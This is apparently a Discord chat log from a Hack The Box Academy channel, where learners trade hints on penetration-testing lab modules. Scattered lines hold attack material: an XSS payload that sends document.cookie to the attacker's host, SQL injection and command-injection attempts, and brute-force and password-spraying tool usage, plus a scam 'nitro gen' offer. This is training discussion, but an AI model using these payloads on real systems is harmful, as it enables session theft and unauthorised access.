#modules

1 messages Β· Page 14 of 1

lament tartan
#

tried a couple of browsers

#

its the "external recon and enumeration principles" section

#

oh n/m it worked eventually

wind gust
#

mhmmm yes and no. A red team path Im looking more for C2 usage. Looking more for some evasion and OPSEC etc...

lethal atlas
#

have you looked for databases?

lament tartan
#

AD module tells me to RDP to Parrot VM, open Wireshark and begin capturing traffic.. If I open Wireshark from tools menu it asks for htb-student password and then just never opens the GUI.. If I try to launch via terminal i get permission denied while trying to capture

#

I guess I don't need to do it anyway but 5 months on and this hasn't been fixed? 😐

frozen atlas
#

hi
i have a doubt
the sc.nextLine in java always skip a line
how to solve that

gusty bough
#

Can anyone give me a real world example of non-public sub-domain usage?

#

Or a reason for why non-public sub-domains would be used outside of testing/learning like in the HTB network.

west canopy
lament tartan
hard lodge
#

Could i text someone about the Module "Active Directory Enumeration & Attacks" section "Privileged Access"?

#

πŸ™‚

cosmic dock
#

Password Attacks - Easy Lab - ran hydra with the username/password.list against FTP and SSh for two hours, and got nothing. Hints? this is super unrealistic

hard lodge
lament tartan
#

Active Directory - Internal Password Spraying - from Linux gives two examples to brute force the password. The bash-one liner works for me but the kerbrute password spray (using same users, password, domain, dc etc..) doesn't work, anybody experienced this or know why it might be? n/m i checked with verbose flag, it was because i locked the user accounts πŸ˜…

severe geyser
#

Hi guys I wanted to ask who do I need to speak to regarding the Pentesting academy please I want to enroll on the pentesting course plus purchase the exam voucher are there any offers on that from HTB thank you.

timber hatch
#

Heello
Modul SQL Injection Fundamentals, question:
Login as the user with the id 5 to get the flag

the sql querry is:
SELECT * FROM logins WHERE (username='admin' AND id > 1) AND password = '21232f297a57a5a743894a0e4a801fc3';

i tried this:
admin') AND id >4 AND id <6# -

Am I even close? haha

timber hatch
#

admin') AND id = '5' # -
this did also not work...

#

any hint in a direction would be nice πŸ˜‰

thorn urchin
#

do you know what DB its running, that would help inform what would be ideal to terminate the sqli query with.

#

also your parens placement for your sqli is a bit wrong

#

youre terminating the where close early by doing so

timber hatch
#

mh..not sure...mariadb could be

iron basin
#

Anyone know how to test a found username against a password list for SMB? Currently on Attacking Common services module and stuck on the second question. Can't figure out how to brute force the username against the list without being lock outed for too many failed attempts.

cosmic dock
#

Password Attacks Medium Lab - how'd yall get ||Dennis||

thorn urchin
#

Okay I feel must be user error of some sort, but im on the skills assessment for the Shells and Payload module, but I cant actually login with the provided credentials for the foothold.

I get the login screen from the NoMachine interface, but then trying to sign into the htb-student account with HTB_@cademy_stdnt! doesnt work.

Says you can also login with ssh, but ssh is refusing connections.

hard lodge
thorn urchin
#

I mean, so is mine, but ill try it

#

ah the pwnbox keyboard was diff for some reason, annoying lol

placid quest
#

@cosmic dock in the database

fathom swift
#

Stuck on the last question for the DNS section of the footprinting module. I'm pretty sure I know what technique to use (per the hint) but I'm struggling to find the ||wordlist|| that will work. Can someone DM to nudge me in the right direction?

feral stump
fathom swift
nimble ridge
#

I'm working on password attaks - password mutations and hydra has been taking me over an hour and it won't crack the user sam's password. can someone please dm me the password to that user? or even just give me a hint to make the command run faster

dreamy garnet
#

DID ANYONE PASS THE FIRST ACTIVE DIRECTORY ASSESSMENT?

#

Need a sanity check for the last flag

hard lodge
dreamy garnet
hard lodge
# dreamy garnet Remind me the question, I don't have my laptop with me

Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt.

the hint says to use mssqlclient but it gets "ConnectionRefusedError: [Errno 111] Connection refused" and according to my scans the port is filtered.

fathom swift
dreamy garnet
hard lodge
#

The one they use on the section

||/usr/bin/impacket-mssqlclient INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth||

dreamy garnet
hard lodge
#

same error

warm turret
#

https://academy.hackthebox.com/achievement/433014/160 anyone else thinks that SOAP APIs are weird? OMG!!!

hard lodge
restive briar
#

hello, anywone who can helpme with task 1 of " Introduction to Assembly" assessment? im really stuck there =/

hard lodge
queen hatch
#

Anyone free to help with Intro to File Upload Attacks? I'm on the whitelist section.

  1. ||I've found a few extensions that say they upload||.
  2. ||I found the directory they should have been uploaded to||.
  3. I'm getting a 404 when trying to access them.

Disregard.

prisma mason
#

Can i get you help with this module if you dont mind im stuck on the part where im trying to figure out which payload works

#

Hello im currently trying to figure out which payload i can use for the session hijacking module all the ones ive used are in my notepad but none of them worked in my NC listener perhaps i typed something wrong??

nvm i got now!!!

stray grove
light quiver
#

Hello Everybody

prisma mason
prisma mason
#

because im just sitting here waiting lol

lunar elm
#

can you give me a hint, same spot you were before.... seems I keep missing it πŸ™‚ even if its before my eyes πŸ™‚

stray grove
stray grove
wind gust
prisma mason
stray grove
#

wait are you doing the skills assessment?

prisma mason
#

no the session hijacking

thorn urchin
#

So for Shells and Payload skill assessment host 2, I understand the exploit and completing it no problem, except that the exploit in question requires a working username and password that is provided to you by the hint in the module scenario section. My question is are you supposed to only know this from clicking the hint, or was there a different intended path for finding this info yourself?

stray grove
#

in ||script.js|| your payload will look like this ||new Image().src='http://your IP/index.php?c='+document.cookie|| it needs to be in the same directory where the php server is running

lunar elm
tender dew
#

Hi, can someone help me with this question : "Find the percentage of users with a path to Domain Admin. Submit just the number as your answer (to two decimal points, i.e. 9.78)." (Module - BloodHound Skill assessments) thank you

lunar elm
#

did you solve this? dont know how to access mysql... I'm burnt πŸ’₯

light quiver
#

does any one want to help me with python

onyx rapids
#

I'm just going to come out and say it.. the Abusing Intermediary Applications AJP section is so confusing and should be removed. I just blindly followed the instructions, but in the end don't understand a single thing I did

#

The following SSRF section is cool though. Extremely insane and just reading it made me have to go to bed now, but at least I have decent understanding of what's happening and how to do it tomorrow

thorn urchin
west canopy
#

I do recall one or two sections in Server-Side attacks felt super long and I kind of lost attention and skipped to the end. Also the skills assessment is not up to par.

west canopy
onyx rapids
onyx rapids
west canopy
#

If you plan on going through the bug bounty hunter path, the Command Injections , Web Attacks, File Upload Attacks are all excellent and really build off each other

#

vert cohesive

#

*very

onyx rapids
onyx rapids
west canopy
#

Definitely appreciate your feedback though. This module was done by a contractor I believe so ill need to check with the team to see what we wanna do when it comes time for module review/updating

onyx rapids
#

I plan on doing every single module offered by the academy and I do want to get the bug bounty hunter certification at the end. It's more of a fun challenge for me than anything else. Not really sure anyone would hire a newbie with only 1 security certification, but who knows

west canopy
onyx rapids
west canopy
#

Yes personally i really enjoyed the module because I had never seen SSRF and SSTI broken down in a way to where I could actually interact and do the thing

onyx rapids
onyx rapids
west canopy
thorn urchin
#

not that I recognize many staff yet, but interactions like this jarednexgent is why youre my current favorite staff member.

onyx rapids
worn forge
#

Hi, has someone finished the printingfoot module? im stuck in a question

west canopy
solar zodiac
#

hi everyone! ok so im on the attacking common apps module doing the worpress exploitation and i cant find the flag in the webroot! I tried find / -name flag.txt 2>/dev/null to locate it but I cant find it! any advice would be greatly appreciated

thorn urchin
#

I am, almost 30% of the way through the cpts course

solar zodiac
#

its not in /var/www 😦

west canopy
solar zodiac
#

thanks πŸ™‚

#

hmm the flag isnt there lol

#

oh wait

#

im blind lol

#

thx πŸ˜„

west canopy
#

np!

worn forge
#

im stuck in the last question of SMB that says "What is the full system path of that specific share?"
I found the path with "netshareenumall" but its incorrect when I submit that as the answer, can someone help me, pls

west canopy
worn forge
#

ok, thx

lunar elm
#

Doing the footprint lab hard - can i get a hint regarding next step once sshd in? I know I need to access the mysql but dont know how.... t## user dont have access, and dont know how to grab other users credentials. THKS!

pearl island
#

Hello all, can someone please help me on the skills assessment of pivoting module?

lunar elm
high totem
#

Question regarding Information Gathering module, Active Infrastructure Identification part. I spawned a target, but there are also vHosts mentioned. Going to any of the vHost adresses is timing out. Scanning a provided IP doesn't return any Apache service (first question asks about the version of Apache). What am I missing?

#

Do I need to add both names to /etc/hosts? If so - both with the same IP? O.o

thorn urchin
high totem
rustic sage
#

Heya

#

Am a newbie

thorn urchin
#

this is how shared hosting servers work in the real world.

high totem
thorn urchin
#

np

west olive
#

If anyone can help me with the final assessment in the SQLmap module pls dm me

timber hatch
#

hi everybody
i have two screens, when i use kali on my notebook screen than everything is so small.
i use vmware and i also tried other Screen Resolutions but nothing seems to be a good solution.
does anybody know the problem?

timber hatch
#

found it. HiDPI mode πŸ˜‰

warm turret
#

@west olive crawl the site and you'll find a post request πŸ˜‰

rich mulch
#

Hi guys, unprivileged user can run "lsof" command under root priv. How I can escalate to root?

dire birch
#

sup guys, have any of you been doing recently the Attacking Common Services module? Especially first task Attacking SMB. I've been stuck on it whole day

#

and my question is if it's not corrupted or something

dire birch
#

i cant download id_rsa from GGJ share

slim plover
#

@dire birch you will need credentials to download it

#

you will figure out the credentials in second question

dire birch
#

ye thats what i thought

#

but idk where resource is

slim plover
#

it's on top right in the webpage

#

under cheat sheet

dire birch
#

no way

#

much thanks

#

i spent 3h on that NotLikeThis

slim plover
#

ahaha

stiff needle
#

hi everyone, can I get a hint on "Broken Authentication" module "Brute Force Cookies" Question # 2? I have tried several decoding methods including url decode, base64, base32 and much more?
Any hint please?

Log in to the target application and tamper the rememberme token to give yourself super user privileges. After escalating privileges, submit the flag as your answer.
brave prawn
#

Hey, did anyone have such error while running ticket converter?

ImportError: cannot import name 'KeyBlock' from 'impacket.krb5.ccache'

twin gulch
#

Hey guys

#

Where do I look for the credentials of MySQL at password attacks section β€˜Password Reuse / Default passwords’ ?

sly grotto
#

can i dm someone about this question?

academy
Footprinting
dns```
balmy radish
#

They have the HTB pwnbox on the parrotsec downloads page

#

You can use it through the browser if you don't want to run a parrot vm on your machine and you wouldn't need to download it if you go that route

stiff needle
#

hi @amber sorrel how did you manage to make it done? any hint please

sly grotto
wind gust
#

guys im doing crackmapexec with --users. I have list of users but how can i save this to a file to to password spraying?

balmy radish
#

I'm not sure then. You can do the regular ParrotOS, it should be pretty close

sturdy igloo
#

help with Web Attacks Skills Assessment. I am able to enumerate the users but i dont see any with username admin or similar and the json does not have a field like role etc

feral stump
languid dawn
#

Ok let's calm down.
Please keep the channel on topic, as for any NFT discussion, this is not the place.
Thank you for understanding @stone gale and @raven cairn .

oblique parcel
#

@rich mulch check gtfo.bin

#

@sly grotto did you figure out what fqdn ends with "203"? If not make sure you are adding the target to your /etc/hosts file
Also make sure you dnsenum all sub domains. The answer will stare you in the face.

sturdy igloo
#

Need Help. Web Attacks - Skills Assessment "Try to escalate your privileges and exploit different vulnerabilities to read the flag at '/flag.php'."

thorn urchin
#

thatd be a version specific vuln for lsof

rich mulch
#

But how to inject?

#

I read the POC but does not understand

#

I did try lsof then after that is Command Injection but does not work

Sudo lsfo -i :80&&whoami

thorn urchin
#

have you checked if its even a vulnerable version

rich mulch
#

Cannot find on searchploit

#

As well as in google

#

When I check sudo -l

#

It say lsof can run no pass, under of rooy

#

Must be do something related to this

thorn urchin
#

right maybe

#

so

#

have you checked the version yet

rich mulch
#

Yes

#

What should I do next?

thorn urchin
#

and whats the version

rich mulch
#

Revision 4.93.2

thorn urchin
#

I dont see a vuln for that version

twin gulch
#

Hey guys. Just stopped for a moment to ask how do you guys writing notes while studying ? I’m using CherryTree and it’s really nice but I think there are more organised tools. Any suggestions?

thorn urchin
#

however I do see that it gives you file read access for other files, perhaps you need to use that to find a more useful file

brazen dust
#

I am using keepnots

#

notes*

#

I am having a weird issue with one of the modules, Active Subdomain Enumeration, its telling me to get the nameserver FQDN but every time I go to try using dig or nslookup to get the info needed it says it can't locate the server inlanefreight.htb. I have tried putting the server in the hosts file hell I even put the dns servers that the pwnbox use in the resolv.conf just to try and get something but nothing

thorn urchin
#

you can @ the server directly as part of the dig command

brazen dust
#

I even tried that dig ns Name@IP

thorn urchin
thorn urchin
#

as in, I googled what lsof does

rich mulch
#

Can u sendme command to read file

#

Example

thorn urchin
#

nvm doesnt actually read file contents, but could still potentially help you find interesting files opened by other users or even kill other processes (which might mean sending other signals to other processes!!)

https://www.thegeekstuff.com/2012/08/lsof-command-examples/

brazen dust
#

Ok so it gives me info but not what I am needing

rich mulch
#

You cannot kill other process

#

Because it need sudo kill

sleek patrol
rich mulch
#

Kill command is not in the list to run under root priv

thorn urchin
balmy cipher
onyx rapids
#

@west canopy I finished the server side skills assessment and it was definitely anticlimactic. I'm almost certain the entire module could benefit from a rework. Some stuff can be removed and maybe only focus on SSRF and SSTI.

foggy light
#

Can anyone help me with flag6 sqlmap?

sturdy igloo
#

Web Attacks Skills Assessment. Able to change|| uid in profile page and end up with admin profile|| but not sure what to do from there.

onyx rapids
foggy light
#

Been woking on it for a while. use the hint prefix. still getting nothing

onyx rapids
foggy light
#

Nice

onyx rapids
thorn urchin
#

The Password Attacks module is pure agony with how long some of these mandatory brutes require.

#

kinda feels like its just wasting my time tbh

sturdy igloo
#

anyone completed "Web Attacks" Skills Assessment that can help me?

sleek patrol
#

Yes! I did it!

sturdy igloo
sleek patrol
sturdy igloo
raven cairn
west canopy
wind gust
#

need hint on WordPress - Discovery & Enumeration

#

anyone available ?

meager stump
#

does anyone know how to hack well with kali linux?

thorn urchin
#

thats such a vague question

#

whats your actual question

meager stump
#

I don't speak English, okay?

raven cairn
meager stump
#

I am interested in learning how to hack a vulnerable website with kali linux

raven cairn
#

Have to keep it legal on this server tho

west canopy
#

will you teach me how to hack????

thorn urchin
#

its like asking how do you fix a car, how do you make art, how do you build a building, how can I farm

raven cairn
#

@meager stump fr fr if you have any questions lmk

thorn urchin
# meager stump ok man relax!

dont worry I am chill, Im just trying to help you help yourself. And I used an analogy to demonstrate why your question wasnt a helpful question for getting the kind of information youre looking for.

raven cairn
#

He’s being realistic. We’re hear to help you at the end of the day.

meager stump
raven cairn
thorn urchin
#

probably Spanish/Portuguese

wind gust
#

siiiiiiiiiiiiiiiiiiiii

sturdy igloo
#

able to get uid and token of administrator type user for web attacks skills assessment but confused as to how to proceed. only links i can click are settings and profile. clicking profile takes me back as htb-student and clicking settings and trying to change admin password says access denied

lethal atlas
warm turret
calm pagoda
#

any hint for the Attacking Enterprise Networks module section External Information Gathering question 3 "What is the FQDN of the associated subdomain?" i have no idea which FQDN for which subdomain do i need

foggy light
#

Any hint for SQLMAP case10?

prisma mason
#

Hello again so ive been working on the XSS skills assessment and im stuck ive tried all the payloads from the session hijacking module and nothing has worked do you have any tips please?

sly tapir
oblique parcel
iron basin
#

hey just to clarify, when it says "vHosts needed for these questions: status.inlanefreight.local" do we just map it to the targetted IP that just spawned?

quasi wave
#

can someone help me with this?

iron basin
#

@thorn urchin Thank you

quasi wave
#

I'm on the Find Files and Directories module

#

I am trying the find command like this:

find / -type f -name *.conf -size +25K -size -28k -newermt 2020-03-03

it doesn't show me the file

#

what am I doing wrong here?

#

can someone help me out?

sharp elm
#

XSS Discovery- I know it is supposed to be susceptible to reflected but when i enter the same reflection script as in a previous step it doesnt create the alert pop up

quasi wave
#

never mind I found answer

livid pier
#

anyone around finish skills assessment 1 of active directory enumeration?

jagged zenith
#

Hello guys

forest tapir
#

Please: Nmap IDS/IPS Evasion Hard Lab ... am I looking at DNS? Or the "high-number-port". Just give me that, at least.

forest tapir
#

I've come down to copy/pasting the module commands at this point (replacing the port # of course)

#

because I don't know what else to do. I've been at this on/off for months

#

Tried combinations of changing trusted-source-port(53), fragmenting, ACK, no-arp, I've even tried spoofing source IP. Tried copy/paste the friggin commands from HTB. The only thing I haven't tried is Zomby-ing from a jump server, which wouldn't make sense under the context

#

I know what these things are. I'm not just blindly following instruction.

#

and it's either port 53 or 50,000. nothing else makes sense

austere tide
#

AD / RESPONDER

We can capture the hash of an account in the network, if the account/user does a broadcast because he doesnt know where to resolve the Name of a Server requested.

--> But how realistic is that?
I mean, does this broadcast only happen if the account/user mistype the Server Name ??

This can not happen to often, does it ?

solar zodiac
#

hey guys im on the attacking common services module and trying to do the mssql stuff. I have a password for mssqlsvc, but can't log in to see flagdb. Can anyone help :)?

#

I tried to psexec and wmiexec since sql accounts are usually local admins on their server... but it never returns anything

inland charm
#

Hey, I've been stuck on the command injection skills assessment for so long, I know the vulnerable parameter and I can escape the blacklisted charaters but cant manage to find the flag.txt file, can someone please help me

high totem
#

Anybody else having problems with sublist3r? I tried both local and Pwnbox, all engines toghether and separate, my target and websites such as google, and it's not returning any results. Like no subdomains existed for google or github πŸ˜„ I tried to use it for skill assessment of information gathering as suggested in the hint, but in the end had to do it manually, due to the above :/

high totem
inland charm
#

yeah, but I get an error message saying the i dont have permission to this directory

feral stump
undone cypress
#

Hi!!
Who passed the task:
Attacking Domain Trusts - Child -> Parent Trusts - from Linux

Module: -AD Enumeration & Attacks
?
Under what account did you receive the NTLM cache for bross?

feral stump
#

Maybe the domains are the problem … I will take a look at it

#

When you say you did it manually you mean with dig and Nslookup?

restive briar
#

hello, anywone who can helpme with task 1 of " Introduction to Assembly" assessment? im still stuck there =/, thanks in advance!

strong saffron
#

Hi

#

I am new in cs cyber security

#

Please help me in understanding it

warm turret
#

@inland charm if you manage to execute commands, think the most obvious way of show the results. For the encoding and format of the injection i shared here a tool called 1nj3ct0r that i did. After that think outside of the box to get the flag file into your available files

inland charm
#

I tried to move file /flag.txt into the tmp folder to be able to view it

#

But I got permission denied error

warm turret
#

It is not the /tmp folder, enumerate better the site to see, it is a custom /tmp folder

#

Somepath/tmp

#

@inland charm you're almost there

inland charm
#

Okay thank youu I’ll try again

restive briar
warm sand
#

for the footprinting academy medium lab, can someone get me a hint for the right syntax for the SQL db query? just missing that to get the flag. thank you

placid quest
#

@warm sand what is the problem

warm sand
wind gust
#

Need help with active directory skill assessment II + 1 Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

vagrant field
#

im stuck on fundamentals module with Service and Process management. when i run systemctl start ssh it asks for authentication

warm turret
#

@vagrant field you are root?? Try "sudo su" first or "sudo systemctl start ssh"

vale salmon
#

Can I get a nudge on the XSS Skills Assessment? Having no luck with any payload.

#

Ope, nevermind. Got it

pseudo ledge
#

@warm turret im also stuck on the linux fundamental module and when I write sudo before the command I get this response: "htb-student is not in the sudoers file. This incident will be reported."

#

or if anybody else can help me with my issue, I'll be very thankful

tough thunder
#

can anyone help me with the password attacks module, ive been stuck for 5 days now and im just at my wits end

pseudo ledge
#

systemctl enable ssh returns uninitialized value:
Synchronizing state of ssh.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable ssh
Use of uninitialized value $service in hash element at /usr/sbin/update-rc.d line 26, <DATA> line 45.
Use of uninitialized value $service in hash element at /usr/sbin/update-rc.d line 26, <DATA> line 45.

#

can anyone help me please?

warm turret
#

@pseudo ledge no idea then, sorry. i did it a year ago πŸ™‚

vapid sparrow
#

if u want a nitro gen dm me
(online version no virus)

balmy radish
#

Cyber chef is pretty easy to use if you want to give that a shot

sinful tundra
#

idk where to put this but man has htb helped me get back to working on pc's doing something i am falling in love with

sly tapir
ripe oak
#

Hi guys

#

Anybody there

sly tapir
#

sup

ripe oak
#

Am cool

#

Am new here

#

Wats d platform all abt

#

I nid someone to help me with some hacking problems, please message me if u can

sly tapir
#

omg

#

i got it

#

😫 i was grabbing the wrong cookie...

sinful tundra
#

hand in the wrong jar hmmm

sly tapir
#

haha

wind gust
#

For the Active Directory Skill assessment II. Should I be brute forcing ?to get the username and password. Im on this question Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

molten marlin
#

Hey, new here and I'm kind of confused. I'm in Linux Fundamentals and 15-30sec after I launch the pwnbox it goes grey screen and bottom right says disconnected. I then hit reset but its a brand new instance. All my progress and previous command line inputs gone and I have to keep starting over and I can't progress. How/what do I need to do so it stops doing that?

sinful tundra
#

help

#

i am lost on Burpsuite

vale salmon
#

So I'm working on File Inclusion Basic Bypasses and I'm struggling to snag the flag. I'm using the path it gives (index.php?language=languages/) and I've tried truncating with ||....//|| but no matter what I put after it, I seem to not be able to get it

sinful tundra
#

any one have a idea why bike module is not showing the email part in burp

quasi wave
#

I need help with something really quick. I know that this command should get me the number of total packages installed:

apt list --installed | wc -l
#

I'm doing the file descriptors and redirections section of Linux Fundamentals module

#

could someone give me a hint

carmine quail
quasi wave
#

nope I solved it

#

but thanks

quasi wave
#

hi I think that I am going to finish Linux Fundamentals Module tomorrow for sure

#

I'm gonna do this last two modules tomorrow and its gonna be great

#

I just gotta get my work done in the morning

high totem
jagged zenith
#

Hello guys

feral stump
warm turret
#

@molten marlin you can try connecting from your own VM using OpenVPN

feral stump
#

@west canopy @distant oar could you please take a look at sublist3r in the skills assessment - information gathering ? Tool doesn’t seem to be working now though it worked in the past

Thanks!

lament tartan
#

tried basically every username and password ive come across throughout the module :/

#

oh n/m, got it

undone cypress
#

Nope, unfortunately, I have marked this task under "?" so far.
I wonder how jarednexgent managed to do this under adunn))πŸ€”
#modules message

lament tartan
verbal estuary
#

Site is not down, its just blacklisted by alot of ISP. Use a VPN to download the binary(thats what i did)

twin gulch
#

Hey guys, I’m at passwords attacks module section Credential hunting. At question 5 - do I really need to fully install ansible to look for those credentials ?

twin gulch
#

?

thorn urchin
#

no

dense maple
#

Any guys there?

#

I need help

#

Idk hacking

#

I want to learn for free

strong saffron
#

Yeah but i doesnt know much

dense maple
#

Can you guys dm me some cool tricks in hacking?

strong saffron
#

@dense maple i am beginner

dense maple
#

What do you know in hacking, a little? Idk a little too

raven copper
#

just run through begginer courses

dense maple
#

I want to learn for free

raven copper
#

the level 0 courses are free

brazen saffron
#

I can not be connected to the server...

I am in the module "Getting Started" and the part name is "Service Scanning".

dense maple
raven copper
#

run with -v and see if packets are being recieved

brazen saffron
#

100% packet loss.

raven copper
#

okay - Sp see what happens

brazen saffron
#

-Sp ?

raven copper
#

one second i may be thinking of another tool

#

is this local host?

brazen saffron
#

?

raven copper
#

same server?

brazen saffron
#

?

raven copper
#

are you pinging in your own server/network

raven copper
#

first you should actuall use nmap then -Sc

#

then add IP

#

the script should start with nmap (-) (-)

ashen shuttle
#

xa DNS

brazen saffron
raven copper
#

and you are root?

#

man nmap

#

use man nmap or nmap -h and it will give you version type

past sapphire
#

Hi everyone, I'm new to security, I've been doing a couple of THM, looking to further studies on HTB.

raven copper
#

@brazen saffron usu nmap -Sl and -Pn -Sc and see what it gives you and you should have an answer

#

add -sV

#

and is you are looking for OS version -O

#

use -A if those dont work

inland charm
#

I've been stuck on the command injection skills assessment for sooo long I literally tried everything and still no hope, I know how to escape the blacklisted characters and I know which parameter is vulnerable. My main problem is when I try the cat command or any other command it is treated as a filename and does not execute as a command, can someone please help me? I can explain in more detail, but it's better to do privately to avoid any spoilers.

brazen saffron
raven copper
#

@brazen saffron did you use -sL

nimble ridge
#

can someone help me with password attacks - attacking sam "Apply the concepts taught in this section to obtain the password to the ITbackdoor user account on the target. Submit the clear-text password as the answer." i believe i have to launch cmd as a first step but i don't see that

sturdy igloo
#

Need help with Attacking Tomcat Question 2. Perform a login bruteforcing attack against Tomcat manager at http://web01.inlanefreight.local:8180. What is the valid password? mgr_brute.py and metasploit module don't seem to get me the password.

sturdy igloo
flat silo
#

Can anyone help me put with the phishing section on the XSS module

sturdy igloo
#

anyone available to help with Attacking Tomcat section of Attacking Common Web Applications had to reboot everything and am ok now

copper coral
#

anyone around to help with the Footprinting Medium lab? I've been stuck for a while.

placid quest
#

@copper coral where are u stuck

sturdy igloo
sly tapir
#

who can i reach out to, to get help on an assessment question? something aint right with it...

sturdy igloo
#

sorry, i am working on JPT not CBBH, so i wont be able to help/look at all.

sly tapir
#

k ty

brazen saffron
west canopy
feral stump
nimble ridge
#

i'm on password attacks hard and found the kdbx file but i'm struggling on downloading it, can someone help me

weak oxide
#

Hey i have a question. I am currently on a challenge and i've read the code like 100 times and found two vulns that i have to compare somehow but im just not able to do this. Can someone give me an hint? Would be cool thanks

copper coral
feral stump
lunar elm
#

I had to resume it a few times with hydra -R. Eventually it found the user/pass

radiant bramble
#

yeee

#

HOW do I use this server I just joined

silver zenith
#

I want to continue backing

#

But stickers on this bullshit thesis

#

Stuck*

#

Fuck school duwde

pastel ginkgo
#

What is the right way to kill a python web/upload server so when I try and make a new one I don't get the following error ?

pastel ginkgo
#

Thats what ive been doing

#

when I try to remake the server I get that error saying the socket is still in use

acoustic owl
pastel ginkgo
#

how do I kill it then as it should of stopped once I killed the server

#

I tried killing my python process but that didnt work either

west canopy
#

try running: sudo lsof -i :8000

#

this will tell you what process is using port 8000

#

then we can kill it πŸ˜‰

acoustic owl
#

netstat -npl

pastel ginkgo
#

netstat npl got it

#

looks like I was hitting ctrl z

#

which i've now learned puts it in the background instead of killing it like ctrl c

warm turret
#

Finally another tricky module finished. This File upload attacks, i almost asked for a hint on the skill assesement πŸ™‚ https://academy.hackthebox.com/achievement/433014/136

#

@pastel ginkgo you can also try: netstat -antp

#

then just kill PID

flat silo
#

Can anyone give me a hand with the phishing section on the xss module I'm pretty sure I have the right payload to execute the script on the page but the last bit removing the img input field isn't working and when I try to usnc to listen it tells me the ports in use and it says quiting

hardy anchor
#

Hey! I need a hint in password attacks medium lab. I found J***** creds and the smb creds for D**** user but doesn't work the D smb cred to login with ssh.

Done. If you need a hint just think where you can store data. Search for a proccess ||top coommand|| ||database||

scarlet sapphire
#

hi im stuck at Windows Privilege Escalation Skills Assessment - Part I i cant get reverse shell can anyone give a hint

thorn urchin
#

read back through the module where it talks about dns

#

read what it says

#

if youre copying the scans its not gunna work. It tells you a variation to try out in the actual text.

#

then im afraid you do not understand

#

changing the IP is a given. but you cannot copy the scans. you must understand what it says and be able to decide how to adjust the scan to get the results.

#

this is as much advice as Im willing to give, good luck.

#

you use your brain and think critically about the material instead of copying things.

#

theres a variation to try out for this situation that it specifically says to try for such a situation

#

Chill out, Im giving you help, but Im not giving you the answer. You must still reach that on your own. but with this kind of question there isnt a whole lot of wiggle room for giving advice without just telling you the answer.

#

you might be able to complete it with ncat as an alternate method

#

different tool

hazy grotto
#

I’m stuck on Archetype. I can’t seem to get myssqlclient to download. I’ve followed a few videos and googled it. Everytime I try to locate MySQLclient it can’t find it

thorn urchin
#

might work, best of luck

sly tapir
#

πŸ˜‚

thorn urchin
#

Β―_(ツ)_/Β―

#

htb modules often presume a certain level of prerequisite knowledge and flexibility for its content. If youre not ready for that, you may in fact be better served elsewhere first.

#

????

sly tapir
#

lets calm down here... he was helping you without giving you the answer and your frustrated

thorn urchin
#

I literally tried to help you and then agreed that yeah there are other learning tools out there that might work better for you???

#

htb has a reputation for being hard, often too hard

#

youre not alone in having difficulty with it, thats okay

sly tapir
#

dude there have been modules where i almost punched my screen...had to walk away clear head and come back and get at it

thorn urchin
#

That sucks, no hard feels from my end. Best of luck.

#

ceh is mostly rote memorization

#

it has 0 hands on

#

HTB wont teach you how to pass the ceh, itll teach you how to actually use the skills in the real world

#

it is, but the format is multiple choice, no practical exam

#

ceh is mostly about terms, policies, ect

#

htb is actually doing the shit

#

CEH will have you answer what metasploit is. HTB will have you tunnel a metasploit priv escalation exploit over a meterpreter channel on a target host where you got a foothold in by abusing a RCE from an outdated blog software that exists in the real world.

#

that example is literal btw

#

havnt heard of em

#

<which doesnt mean they're bad, I just havnt heard of em>

#

I mean if you got a voucher might as well take it

#

its still good for resumes

#

it just doesnt teach you what you need to know to do the job

#

sounds like a plan

rustic sage
#

nah

#

thx

silver zenith
#

Tough life Ned

#

You need a.I. to help you predikt the crypto market and get rich while sleeping

warm turret
#

@solid wedge doing hacking for the wrong reason. Try to learn hacking just to be better paid will get you even more frustrated. Try to get a job that you could do for free and the money will come after. I spent 6 years earning $16 by month so... Take what you have, try moving out. Think of structure your life first and then learn to hack because you love it and not for a bigger payout. Do BBH at nights maybe πŸ˜‰

stone gale
#

Has anyone heard of Mystopians on CoralCube and are they any good like CryptoPunks will increase in value?

feral stump
#

πŸ™„

tame ingot
#

Markup, task 1, answer should be 2.4.41 as that is the version of Apache running, and it matches the suggested answer format, but no bueno

tame ingot
#

nvm, foxyproxy was on πŸ€¦β€β™‚οΈ

stiff needle
#

hi..broken authentication module is killing me..i have enumerated two usernames and how to tamper cookies but those two users's are not temperable. i have tried many wordlists and almost have checked 56000 words but no useful username is being found. please give a hint

#

its relevant to skills assessment

undone cypress
lament tartan
empty adder
#

Anyone done the introduction of python? Can't find the class of x_coordinate. It tells to do IDLE. But I get no response. What am I missing?

raven cairn
#

This is the 2nd time they have been advertising crypto nonsense

#

Shut the fuck up please

#

😭

#

@urban sage

languid dawn
#

This is a warning btw @stone gale any more and we'll take action. Keep the channels on topic.

thorn urchin
#

I think theres some mystopians shill effort going around. been a lot of people joining the server to just "ask" about mystopians

#

100% so people go, no whats that? and google it. More likely to work and get eyeballs that just blatant link spam that people tune out.

languid dawn
#

Hmm, we'll take note of that, I did see many more people than usual ask weird questions about cryptocurrencies lately.

#

thanks tipsfedora

raven cairn
#

Thank you mod team. Keep up the good work

#

πŸ”₯πŸ”₯πŸ”₯

safe token
#

does anyone know why do i get this error msg: ** server can't find inlanefreight.htb: NXDOMAIN

#

information gethering - web edition/active subdomain enumeration

#

i added the traget ip with the inlanefreight.htb to the hosts file

sharp torrent
#

Can someone provide a nudge for the active directory assessment? I'm having issues using PSSeSSion to remote into another server. I'm logged in as system and trying to authenticate to another box on the same domain ( as Administrator). Running klist shows i have kerberos tickets stored in cache. However PSSession commands are failing / freezing the shell.

#

thanks in advance.

dawn leaf
#

Got user1 in Privilege Escalation but cant get the root, the hint is don't forget to chmod but I'm not sure if I'm supposed to chmod the is_rsa

thorn urchin
#

id_rsa needs right perms or else ssh wont accept it

safe token
#

madfox. i've seen you hlep a lot of ppl here. could you help me? im stuck and have no idea what im doin wrong...also the nslookup that is shown in the module to be used doesn't work

thorn urchin
#

you added it to the host file, are you also @rustic sageip for you commands?

dawn leaf
safe token
#

i added to the host file

thorn urchin
#

yeah but for you nslookup are you @ it as well to select it as the name server to use

safe token
#

